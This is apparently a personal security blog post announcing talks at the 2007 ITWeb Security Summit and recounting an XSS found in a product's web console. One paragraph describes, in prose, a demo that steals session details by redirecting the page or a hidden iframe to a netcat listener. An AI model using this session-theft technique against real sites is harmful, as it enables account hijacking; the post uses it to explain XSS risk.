There is something very big going on in the security world. It is rare to see things pushed forward quite this fast. I'm talking about the latest advances in web application security. I'm calling it Web Hacking 2.0 (gettit?).

ITWeb will be holding their 2007 Security Summit. The keynotes are Bruce Schneier and Phil Zimmerman. The best part is, three of our abstracts were accepted. Nithen, Yusuf and Johann will be presenting.

I sat up one night trying to figure out what I would say to Schneier. He is one of the reasons I got into security as a job. I remember having just finished my honours degree (our first postgrad degree before a Masters) and reading Secret's and Lies. It made me realise I could turn my hobby into a job. How does one meet a 'celebrity' and not come across as a gushing teen ready to part with her bra? I don't know, but I am going to try hard to take him out to dinner.

So, if you will be near SA, or are prepared to fly here, come to the ITWeb Security Summit to watch us present :)

This week I was reviewing a security product and discovered a rather serious XSS in their web console. When I highlighted this to the product's technical team, they claimed it was a vulnerability in IIS and not their product. It was rather silly of them to claim that outputting javascript was the fault of the web server. However, it did highlight two interesting facts about XSS' to me: An alert box displaying 'XSS' or unintelligible session details means very little to many people who should know better. You need to have a canned, high-level, explanation about what the dangers of an XSS really are.

A quick an easy demo, which I put here mostly for my own memory, is to just change the window location to point to a machine where you have set up a netcat listener with the session details and url appended to the request. If you want to be stealthy, you can use a hidden iframe.

RSnake has put up a really great write-up entitled, Death by a 1000 cuts. It describes how a series of minor security issues can be combined to form a very serious attack.

I spent most of my time dealing with security operational issues, where sometimes these sorts of minor issues are where I have to make concessions to get the big stuff done. I think this is a really great example that we security people need to take to developers and it operational staff to show them why defense-in-depth is necessary.